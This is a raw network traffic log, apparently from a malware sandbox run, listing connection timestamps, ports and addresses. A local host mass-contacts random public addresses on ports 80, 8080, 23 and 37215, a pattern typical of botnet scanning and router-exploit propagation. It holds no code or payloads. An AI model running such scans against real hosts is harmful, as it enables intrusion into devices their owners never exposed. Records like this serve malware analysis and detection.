                                                        Feb 14, 2024 09:32:45.002507925 CET4023580192.168.2.1495.188.234.16
                                                        Feb 14, 2024 09:32:45.002516985 CET4023580192.168.2.1495.152.192.187
                                                        Feb 14, 2024 09:32:45.002521038 CET4023580192.168.2.1495.42.30.26
                                                        Feb 14, 2024 09:32:45.002543926 CET4023580192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.002543926 CET4023580192.168.2.1495.191.107.110
                                                        Feb 14, 2024 09:32:45.002543926 CET4023580192.168.2.1495.50.255.108
                                                        Feb 14, 2024 09:32:45.002543926 CET4023580192.168.2.1495.16.150.59
                                                        Feb 14, 2024 09:32:45.002548933 CET4023580192.168.2.1495.161.76.219
                                                        Feb 14, 2024 09:32:45.002566099 CET4023580192.168.2.1495.150.13.186
                                                        Feb 14, 2024 09:32:45.002568007 CET4023580192.168.2.1495.253.82.224
                                                        Feb 14, 2024 09:32:45.002573013 CET4023580192.168.2.1495.153.169.159
                                                        Feb 14, 2024 09:32:45.002582073 CET4023580192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.002583981 CET4023580192.168.2.1495.247.67.114
                                                        Feb 14, 2024 09:32:45.002604008 CET4023580192.168.2.1495.39.28.226
                                                        Feb 14, 2024 09:32:45.002618074 CET4023580192.168.2.1495.254.118.214
                                                        Feb 14, 2024 09:32:45.002618074 CET4023580192.168.2.1495.102.139.247
                                                        Feb 14, 2024 09:32:45.002619028 CET4023580192.168.2.1495.112.16.57
                                                        Feb 14, 2024 09:32:45.002625942 CET4023580192.168.2.1495.186.34.55
                                                        Feb 14, 2024 09:32:45.002639055 CET4023580192.168.2.1495.210.40.253
                                                        Feb 14, 2024 09:32:45.002648115 CET4023580192.168.2.1495.20.159.163
                                                        Feb 14, 2024 09:32:45.002655983 CET4023580192.168.2.1495.32.133.202
                                                        Feb 14, 2024 09:32:45.002655983 CET4023580192.168.2.1495.16.62.193
                                                        Feb 14, 2024 09:32:45.002655983 CET4023580192.168.2.1495.197.10.127
                                                        Feb 14, 2024 09:32:45.002675056 CET4023580192.168.2.1495.129.203.41
                                                        Feb 14, 2024 09:32:45.002686977 CET4023580192.168.2.1495.142.171.160
                                                        Feb 14, 2024 09:32:45.002686977 CET4023580192.168.2.1495.155.91.97
                                                        Feb 14, 2024 09:32:45.002701044 CET4023580192.168.2.1495.119.79.177
                                                        Feb 14, 2024 09:32:45.002712965 CET4023580192.168.2.1495.48.254.20
                                                        Feb 14, 2024 09:32:45.002717972 CET4023580192.168.2.1495.67.43.56
                                                        Feb 14, 2024 09:32:45.002731085 CET4023580192.168.2.1495.170.171.146
                                                        Feb 14, 2024 09:32:45.002739906 CET4023580192.168.2.1495.27.168.191
                                                        Feb 14, 2024 09:32:45.002757072 CET4023580192.168.2.1495.236.144.84
                                                        Feb 14, 2024 09:32:45.002760887 CET4023580192.168.2.1495.71.110.122
                                                        Feb 14, 2024 09:32:45.002760887 CET4023580192.168.2.1495.163.113.57
                                                        Feb 14, 2024 09:32:45.002768040 CET4023580192.168.2.1495.40.137.202
                                                        Feb 14, 2024 09:32:45.002794027 CET4023580192.168.2.1495.66.224.173
                                                        Feb 14, 2024 09:32:45.002794027 CET4023580192.168.2.1495.147.224.250
                                                        Feb 14, 2024 09:32:45.002805948 CET4023580192.168.2.1495.115.176.73
                                                        Feb 14, 2024 09:32:45.002805948 CET4023580192.168.2.1495.7.206.43
                                                        Feb 14, 2024 09:32:45.002810001 CET4023580192.168.2.1495.143.224.50
                                                        Feb 14, 2024 09:32:45.002810001 CET4023580192.168.2.1495.24.36.231
                                                        Feb 14, 2024 09:32:45.002811909 CET4023580192.168.2.1495.69.230.204
                                                        Feb 14, 2024 09:32:45.002826929 CET4023580192.168.2.1495.177.191.214
                                                        Feb 14, 2024 09:32:45.002835989 CET4023580192.168.2.1495.42.196.91
                                                        Feb 14, 2024 09:32:45.002835989 CET4023580192.168.2.1495.97.113.57
                                                        Feb 14, 2024 09:32:45.002854109 CET4023580192.168.2.1495.143.165.116
                                                        Feb 14, 2024 09:32:45.002855062 CET4023580192.168.2.1495.42.59.111
                                                        Feb 14, 2024 09:32:45.002855062 CET4023580192.168.2.1495.141.229.123
                                                        Feb 14, 2024 09:32:45.002880096 CET4023580192.168.2.1495.134.218.191
                                                        Feb 14, 2024 09:32:45.002880096 CET4023580192.168.2.1495.213.26.230
                                                        Feb 14, 2024 09:32:45.002882004 CET4023580192.168.2.1495.9.91.173
                                                        Feb 14, 2024 09:32:45.002886057 CET4023580192.168.2.1495.223.179.59
                                                        Feb 14, 2024 09:32:45.002892971 CET4023580192.168.2.1495.114.176.75
                                                        Feb 14, 2024 09:32:45.002907038 CET4023580192.168.2.1495.46.41.52
                                                        Feb 14, 2024 09:32:45.002923012 CET4023580192.168.2.1495.54.36.117
                                                        Feb 14, 2024 09:32:45.002923012 CET4023580192.168.2.1495.52.160.201
                                                        Feb 14, 2024 09:32:45.002928019 CET4023580192.168.2.1495.133.237.118
                                                        Feb 14, 2024 09:32:45.002928019 CET4023580192.168.2.1495.179.240.47
                                                        Feb 14, 2024 09:32:45.002937078 CET4023580192.168.2.1495.227.120.113
                                                        Feb 14, 2024 09:32:45.002954006 CET4023580192.168.2.1495.246.255.215
                                                        Feb 14, 2024 09:32:45.002960920 CET4023580192.168.2.1495.134.111.56
                                                        Feb 14, 2024 09:32:45.002962112 CET4023580192.168.2.1495.181.113.179
                                                        Feb 14, 2024 09:32:45.002998114 CET4222880192.168.2.1488.221.135.33
                                                        Feb 14, 2024 09:32:45.002998114 CET4222880192.168.2.1488.221.135.33
                                                        Feb 14, 2024 09:32:45.003034115 CET4228080192.168.2.1488.221.135.33
                                                        Feb 14, 2024 09:32:45.008491993 CET804301088.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.008583069 CET4301080192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.008596897 CET4301080192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.008596897 CET4301080192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.008620977 CET4301880192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.009911060 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.009984016 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.009996891 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.009996891 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.010025024 CET4837480192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.012387037 CET805175895.100.116.124192.168.2.14
                                                        Feb 14, 2024 09:32:45.012444973 CET5175880192.168.2.1495.100.116.124
                                                        Feb 14, 2024 09:32:45.012444973 CET5175880192.168.2.1495.100.116.124
                                                        Feb 14, 2024 09:32:45.012444973 CET5175880192.168.2.1495.100.116.124
                                                        Feb 14, 2024 09:32:45.012460947 CET5176880192.168.2.1495.100.116.124
                                                        Feb 14, 2024 09:32:45.016916990 CET2333323109.74.15.61192.168.2.14
                                                        Feb 14, 2024 09:32:45.021014929 CET804296888.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.021076918 CET4296880192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.021095991 CET4296880192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.021095991 CET4296880192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.021102905 CET4302480192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.022891045 CET233332378.142.240.41192.168.2.14
                                                        Feb 14, 2024 09:32:45.029880047 CET2333323177.106.141.235192.168.2.14
                                                        Feb 14, 2024 09:32:45.047149897 CET233332395.143.7.44192.168.2.14
                                                        Feb 14, 2024 09:32:45.047971010 CET80805651694.123.56.17192.168.2.14
                                                        Feb 14, 2024 09:32:45.048564911 CET806078695.175.103.66192.168.2.14
                                                        Feb 14, 2024 09:32:45.048635006 CET6078680192.168.2.1495.175.103.66
                                                        Feb 14, 2024 09:32:45.048671007 CET6079880192.168.2.1495.175.103.66
                                                        Feb 14, 2024 09:32:45.048691988 CET6078680192.168.2.1495.175.103.66
                                                        Feb 14, 2024 09:32:45.048691988 CET6078680192.168.2.1495.175.103.66
                                                        Feb 14, 2024 09:32:45.065874100 CET392088080192.168.2.1431.136.96.21
                                                        Feb 14, 2024 09:32:45.079308033 CET8040235112.184.251.43192.168.2.14
                                                        Feb 14, 2024 09:32:45.084352016 CET2333323175.215.136.133192.168.2.14
                                                        Feb 14, 2024 09:32:45.092719078 CET2333323118.51.70.41192.168.2.14
                                                        Feb 14, 2024 09:32:45.107280970 CET8040235112.154.161.184192.168.2.14
                                                        Feb 14, 2024 09:32:45.115545034 CET8040235112.208.226.126192.168.2.14
                                                        Feb 14, 2024 09:32:45.129861116 CET502248080192.168.2.1431.136.68.206
                                                        Feb 14, 2024 09:32:45.132003069 CET8040235112.201.250.90192.168.2.14
                                                        Feb 14, 2024 09:32:45.133694887 CET80804074785.10.88.154192.168.2.14
                                                        Feb 14, 2024 09:32:45.136672974 CET8040235112.104.90.189192.168.2.14
                                                        Feb 14, 2024 09:32:45.145562887 CET2333323180.7.235.194192.168.2.14
                                                        Feb 14, 2024 09:32:45.147587061 CET372153997941.23.226.209192.168.2.14
                                                        Feb 14, 2024 09:32:45.148407936 CET8040235112.49.54.198192.168.2.14
                                                        Feb 14, 2024 09:32:45.148464918 CET4023580192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.155534983 CET2333323124.158.228.155192.168.2.14
                                                        Feb 14, 2024 09:32:45.171530008 CET2333323182.79.83.232192.168.2.14
                                                        Feb 14, 2024 09:32:45.175889015 CET8040235112.133.238.252192.168.2.14
                                                        Feb 14, 2024 09:32:45.175952911 CET4023580192.168.2.14112.133.238.252
                                                        Feb 14, 2024 09:32:45.195825100 CET804222888.221.135.33192.168.2.14
                                                        Feb 14, 2024 09:32:45.195878029 CET804228088.221.135.33192.168.2.14
                                                        Feb 14, 2024 09:32:45.196113110 CET804222888.221.135.33192.168.2.14
                                                        Feb 14, 2024 09:32:45.196193933 CET804222888.221.135.33192.168.2.14
                                                        Feb 14, 2024 09:32:45.196198940 CET4228080192.168.2.1488.221.135.33
                                                        Feb 14, 2024 09:32:45.196198940 CET4228080192.168.2.1488.221.135.33
                                                        Feb 14, 2024 09:32:45.196198940 CET4222880192.168.2.1488.221.135.33
                                                        Feb 14, 2024 09:32:45.196203947 CET4602080192.168.2.14112.133.238.252
                                                        Feb 14, 2024 09:32:45.196227074 CET3639280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.196244001 CET4222880192.168.2.1488.221.135.33
                                                        Feb 14, 2024 09:32:45.205229044 CET804023595.100.79.210192.168.2.14
                                                        Feb 14, 2024 09:32:45.205291033 CET4023580192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.208478928 CET804837488.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.208549976 CET3792080192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.208651066 CET4837480192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.208651066 CET4837480192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.209912062 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.212487936 CET804023595.111.248.64192.168.2.14
                                                        Feb 14, 2024 09:32:45.212552071 CET4023580192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.217749119 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.217791080 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.217804909 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.217828989 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.217842102 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.217866898 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.217871904 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.217905998 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.217922926 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.217958927 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.217963934 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.217998028 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.218000889 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.218035936 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.218040943 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.218075037 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.218080044 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.218108892 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.218121052 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.218142033 CET804832088.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.218151093 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.218183041 CET4832080192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.218720913 CET804301088.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.219805002 CET804301088.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.220048904 CET804301888.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.220082045 CET804023595.100.112.91192.168.2.14
                                                        Feb 14, 2024 09:32:45.220123053 CET4023580192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.220139027 CET5500680192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.220220089 CET4301880192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.220220089 CET4301880192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.220249891 CET4460280192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.225652933 CET805176895.100.116.124192.168.2.14
                                                        Feb 14, 2024 09:32:45.225703955 CET5176880192.168.2.1495.100.116.124
                                                        Feb 14, 2024 09:32:45.225703955 CET5176880192.168.2.1495.100.116.124
                                                        Feb 14, 2024 09:32:45.226319075 CET805175895.100.116.124192.168.2.14
                                                        Feb 14, 2024 09:32:45.226555109 CET805175895.100.116.124192.168.2.14
                                                        Feb 14, 2024 09:32:45.226594925 CET5175880192.168.2.1495.100.116.124
                                                        Feb 14, 2024 09:32:45.226630926 CET805175895.100.116.124192.168.2.14
                                                        Feb 14, 2024 09:32:45.226664066 CET5175880192.168.2.1495.100.116.124
                                                        Feb 14, 2024 09:32:45.231575012 CET804302488.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.231642962 CET4302480192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.231642962 CET4302480192.168.2.1488.221.195.197
                                                        Feb 14, 2024 09:32:45.231646061 CET804023595.217.21.57192.168.2.14
                                                        Feb 14, 2024 09:32:45.231693983 CET804023595.42.30.26192.168.2.14
                                                        Feb 14, 2024 09:32:45.232033968 CET804296888.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.232359886 CET804296888.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.248506069 CET8040235112.49.54.198192.168.2.14
                                                        Feb 14, 2024 09:32:45.248569965 CET4023580192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.251657009 CET804023595.215.57.157192.168.2.14
                                                        Feb 14, 2024 09:32:45.251974106 CET4023580192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.257148981 CET804023595.0.234.42192.168.2.14
                                                        Feb 14, 2024 09:32:45.257222891 CET4023580192.168.2.1495.0.234.42
                                                        Feb 14, 2024 09:32:45.257848978 CET392148080192.168.2.1431.136.96.21
                                                        Feb 14, 2024 09:32:45.286815882 CET806079895.175.103.66192.168.2.14
                                                        Feb 14, 2024 09:32:45.287111044 CET6079880192.168.2.1495.175.103.66
                                                        Feb 14, 2024 09:32:45.287111998 CET6079880192.168.2.1495.175.103.66
                                                        Feb 14, 2024 09:32:45.287189007 CET3640280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.287216902 CET5029080192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.287252903 CET4685880192.168.2.1495.0.234.42
                                                        Feb 14, 2024 09:32:45.291945934 CET806078695.175.103.66192.168.2.14
                                                        Feb 14, 2024 09:32:45.292121887 CET806078695.175.103.66192.168.2.14
                                                        Feb 14, 2024 09:32:45.292202950 CET6078680192.168.2.1495.175.103.66
                                                        Feb 14, 2024 09:32:45.295649052 CET804023595.57.64.182192.168.2.14
                                                        Feb 14, 2024 09:32:45.295739889 CET4023580192.168.2.1495.57.64.182
                                                        Feb 14, 2024 09:32:45.388662100 CET804228088.221.135.33192.168.2.14
                                                        Feb 14, 2024 09:32:45.388758898 CET4228080192.168.2.1488.221.135.33
                                                        Feb 14, 2024 09:32:45.407394886 CET804837488.98.24.227192.168.2.14
                                                        Feb 14, 2024 09:32:45.407599926 CET4837480192.168.2.1488.98.24.227
                                                        Feb 14, 2024 09:32:45.409368038 CET803792095.100.79.210192.168.2.14
                                                        Feb 14, 2024 09:32:45.409523964 CET3792080192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.409553051 CET4489680192.168.2.1495.57.64.182
                                                        Feb 14, 2024 09:32:45.409570932 CET3792080192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.409570932 CET3792080192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.409580946 CET3793480192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.417947054 CET502308080192.168.2.1431.136.68.206
                                                        Feb 14, 2024 09:32:45.429848909 CET805500695.111.248.64192.168.2.14
                                                        Feb 14, 2024 09:32:45.430110931 CET5500680192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.430110931 CET5500680192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.430110931 CET5500680192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.430249929 CET5502080192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.431581020 CET804301888.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.432528019 CET804460295.100.112.91192.168.2.14
                                                        Feb 14, 2024 09:32:45.432619095 CET4460280192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.432619095 CET4460280192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.432646036 CET4461680192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.432661057 CET4460280192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.439570904 CET805176895.100.116.124192.168.2.14
                                                        Feb 14, 2024 09:32:45.439656019 CET5176880192.168.2.1495.100.116.124
                                                        Feb 14, 2024 09:32:45.440813065 CET804302488.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.441881895 CET804302488.221.195.197192.168.2.14
                                                        Feb 14, 2024 09:32:45.458100080 CET8040235112.49.54.198192.168.2.14
                                                        Feb 14, 2024 09:32:45.458304882 CET4023580192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.530580997 CET806079895.175.103.66192.168.2.14
                                                        Feb 14, 2024 09:32:45.533042908 CET805029095.215.57.157192.168.2.14
                                                        Feb 14, 2024 09:32:45.533194065 CET5029080192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.533251047 CET3641680192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.533274889 CET5029080192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.533274889 CET5029080192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.533389091 CET5030480192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.536412954 CET804685895.0.234.42192.168.2.14
                                                        Feb 14, 2024 09:32:45.536515951 CET4685880192.168.2.1495.0.234.42
                                                        Feb 14, 2024 09:32:45.536515951 CET4685880192.168.2.1495.0.234.42
                                                        Feb 14, 2024 09:32:45.536515951 CET4685880192.168.2.1495.0.234.42
                                                        Feb 14, 2024 09:32:45.536531925 CET4687280192.168.2.1495.0.234.42
                                                        Feb 14, 2024 09:32:45.566008091 CET8036392112.49.54.198192.168.2.14
                                                        Feb 14, 2024 09:32:45.566178083 CET3642280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.566189051 CET3639280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.566189051 CET3639280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.566189051 CET3639280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.573422909 CET8046020112.133.238.252192.168.2.14
                                                        Feb 14, 2024 09:32:45.573506117 CET4602080192.168.2.14112.133.238.252
                                                        Feb 14, 2024 09:32:45.573544979 CET4602080192.168.2.14112.133.238.252
                                                        Feb 14, 2024 09:32:45.573544979 CET4602080192.168.2.14112.133.238.252
                                                        Feb 14, 2024 09:32:45.573570967 CET4605080192.168.2.14112.133.238.252
                                                        Feb 14, 2024 09:32:45.610829115 CET803792095.100.79.210192.168.2.14
                                                        Feb 14, 2024 09:32:45.610892057 CET803792095.100.79.210192.168.2.14
                                                        Feb 14, 2024 09:32:45.610927105 CET803792095.100.79.210192.168.2.14
                                                        Feb 14, 2024 09:32:45.610991955 CET3792080192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.610991955 CET3792080192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.613436937 CET803793495.100.79.210192.168.2.14
                                                        Feb 14, 2024 09:32:45.613538980 CET3793480192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.613570929 CET3793480192.168.2.1495.100.79.210
                                                        Feb 14, 2024 09:32:45.639938116 CET805500695.111.248.64192.168.2.14
                                                        Feb 14, 2024 09:32:45.640202999 CET805502095.111.248.64192.168.2.14
                                                        Feb 14, 2024 09:32:45.640222073 CET805500695.111.248.64192.168.2.14
                                                        Feb 14, 2024 09:32:45.640239000 CET805500695.111.248.64192.168.2.14
                                                        Feb 14, 2024 09:32:45.640392065 CET5502080192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.640465975 CET5500680192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.640465975 CET5500680192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.640474081 CET5502080192.168.2.1495.111.248.64
                                                        Feb 14, 2024 09:32:45.644889116 CET804461695.100.112.91192.168.2.14
                                                        Feb 14, 2024 09:32:45.644912004 CET804460295.100.112.91192.168.2.14
                                                        Feb 14, 2024 09:32:45.644943953 CET4461680192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.644956112 CET4461680192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.645168066 CET804460295.100.112.91192.168.2.14
                                                        Feb 14, 2024 09:32:45.645224094 CET4460280192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.645944118 CET804460295.100.112.91192.168.2.14
                                                        Feb 14, 2024 09:32:45.645998001 CET4460280192.168.2.1495.100.112.91
                                                        Feb 14, 2024 09:32:45.646681070 CET8036402112.49.54.198192.168.2.14
                                                        Feb 14, 2024 09:32:45.646728992 CET3640280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.646754026 CET3640280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.646754026 CET3640280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.646801949 CET3642680192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.669692993 CET8036392112.49.54.198192.168.2.14
                                                        Feb 14, 2024 09:32:45.669776917 CET3639280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.706340075 CET804489695.57.64.182192.168.2.14
                                                        Feb 14, 2024 09:32:45.706615925 CET4489680192.168.2.1495.57.64.182
                                                        Feb 14, 2024 09:32:45.706672907 CET4491680192.168.2.1495.57.64.182
                                                        Feb 14, 2024 09:32:45.706698895 CET4489680192.168.2.1495.57.64.182
                                                        Feb 14, 2024 09:32:45.706698895 CET4489680192.168.2.1495.57.64.182
                                                        Feb 14, 2024 09:32:45.748173952 CET8036402112.49.54.198192.168.2.14
                                                        Feb 14, 2024 09:32:45.748362064 CET3640280192.168.2.14112.49.54.198
                                                        Feb 14, 2024 09:32:45.778908968 CET805029095.215.57.157192.168.2.14
                                                        Feb 14, 2024 09:32:45.778935909 CET805029095.215.57.157192.168.2.14
                                                        Feb 14, 2024 09:32:45.778951883 CET805029095.215.57.157192.168.2.14
                                                        Feb 14, 2024 09:32:45.779125929 CET5029080192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.779125929 CET5029080192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.781353951 CET804687295.0.234.42192.168.2.14
                                                        Feb 14, 2024 09:32:45.781447887 CET4687280192.168.2.1495.0.234.42
                                                        Feb 14, 2024 09:32:45.781500101 CET4687280192.168.2.1495.0.234.42
                                                        Feb 14, 2024 09:32:45.781750917 CET805030495.215.57.157192.168.2.14
                                                        Feb 14, 2024 09:32:45.781843901 CET5030480192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.781883955 CET5030480192.168.2.1495.215.57.157
                                                        Feb 14, 2024 09:32:45.786325932 CET804685895.0.234.42192.168.2.14
                                                        Feb 14, 2024 09:32:45.793864965 CET3997937215192.168.2.14197.154.166.0
                                                        Feb 14, 2024 09:32:45.793864965 CET3997937215192.168.2.14197.4.5.232
                                                        Feb 14, 2024 09:32:45.793864965 CET3997937215192.168.2.14197.171.171.154
                                                        Feb 14, 2024 09:32:45.793900967 CET3997937215192.168.2.14197.8.112.12
                                                        Feb 14, 2024 09:32:45.793900967 CET3997937215192.168.2.14197.126.77.78
                                                        Feb 14, 2024 09:32:45.793906927 CET3997937215192.168.2.14197.83.130.145
                                                        Feb 14, 2024 09:32:45.793915987 CET3997937215192.168.2.14197.15.112.13
                                                        Feb 14, 2024 09:32:45.793937922 CET3997937215192.168.2.14197.43.246.130
                                                        Feb 14, 2024 09:32:45.793947935 CET3997937215192.168.2.14197.122.49.12
                                                        Feb 14, 2024 09:32:45.793947935 CET3997937215192.168.2.14197.72.211.212
                                                        Feb 14, 2024 09:32:45.793956995 CET3997937215192.168.2.14197.170.178.18
                                                        Feb 14, 2024 09:32:45.793956995 CET3997937215192.168.2.14197.150.130.214
                                                        Feb 14, 2024 09:32:45.793984890 CET3997937215192.168.2.14197.167.131.203
                                                        Feb 14, 2024 09:32:45.793984890 CET3997937215192.168.2.14197.230.227.228
                                                        Feb 14, 2024 09:32:45.793992996 CET3997937215192.168.2.14197.149.247.193
                                                        Feb 14, 2024 09:32:45.793992996 CET3997937215192.168.2.14197.126.185.145
                                                        Feb 14, 2024 09:32:45.794003010 CET3997937215192.168.2.14197.7.12.94
                                                        Feb 14, 2024 09:32:45.793992996 CET3997937215192.168.2.14197.30.253.214
                                                        Feb 14, 2024 09:32:45.794011116 CET3997937215192.168.2.14197.210.211.89
                                                        Feb 14, 2024 09:32:45.794018030 CET3997937215192.168.2.14197.235.15.181
                                                        Feb 14, 2024 09:32:45.794011116 CET3997937215192.168.2.14197.27.50.136
                                                        Feb 14, 2024 09:32:45.794011116 CET3997937215192.168.2.14197.129.147.168
                                                        Feb 14, 2024 09:32:45.794011116 CET3997937215192.168.2.14197.62.139.102
                                                        Feb 14, 2024 09:32:45.794023991 CET3997937215192.168.2.14197.58.243.28
                                                        Feb 14, 2024 09:32:45.794012070 CET3997937215192.168.2.14197.234.6.115
                                                        Feb 14, 2024 09:32:45.794023991 CET3997937215192.168.2.14197.162.144.201
                                                        Feb 14, 2024 09:32:45.794033051 CET3997937215192.168.2.14197.94.127.198
                                                        Feb 14, 2024 09:32:45.794045925 CET3997937215192.168.2.14197.170.178.124
                                                        Feb 14, 2024 09:32:45.794063091 CET3997937215192.168.2.14197.248.157.1
                                                        Feb 14, 2024 09:32:45.794064999 CET3997937215192.168.2.14197.100.227.164
                                                        Feb 14, 2024 09:32:45.794083118 CET3997937215192.168.2.14197.156.140.224
                                                        Feb 14, 2024 09:32:45.794096947 CET3997937215192.168.2.14197.136.157.220
                                                        Feb 14, 2024 09:32:45.794096947 CET3997937215192.168.2.14197.101.124.185
                                                        Feb 14, 2024 09:32:45.794101000 CET3997937215192.168.2.14197.70.92.207
                                                        Feb 14, 2024 09:32:45.794101000 CET3997937215192.168.2.14197.234.161.16
                                                        Feb 14, 2024 09:32:45.794114113 CET3997937215192.168.2.14197.84.79.69
                                                        Feb 14, 2024 09:32:45.794126034 CET3997937215192.168.2.14197.130.96.238
                                                        Feb 14, 2024 09:32:45.794131041 CET3997937215192.168.2.14197.157.48.144
                                                        Feb 14, 2024 09:32:45.794145107 CET3997937215192.168.2.14197.187.243.109
                                                        Feb 14, 2024 09:32:45.794147015 CET3997937215192.168.2.14197.35.218.95
                                                        Feb 14, 2024 09:32:45.794156075 CET3997937215192.168.2.14197.186.105.91
                                                        Feb 14, 2024 09:32:45.794156075 CET3997937215192.168.2.14197.121.74.65
                                                        Feb 14, 2024 09:32:45.794156075 CET3997937215192.168.2.14197.190.226.112
                                                        Feb 14, 2024 09:32:45.794156075 CET3997937215192.168.2.14197.13.59.48
                                                        Feb 14, 2024 09:32:45.794161081 CET3997937215192.168.2.14197.9.179.189
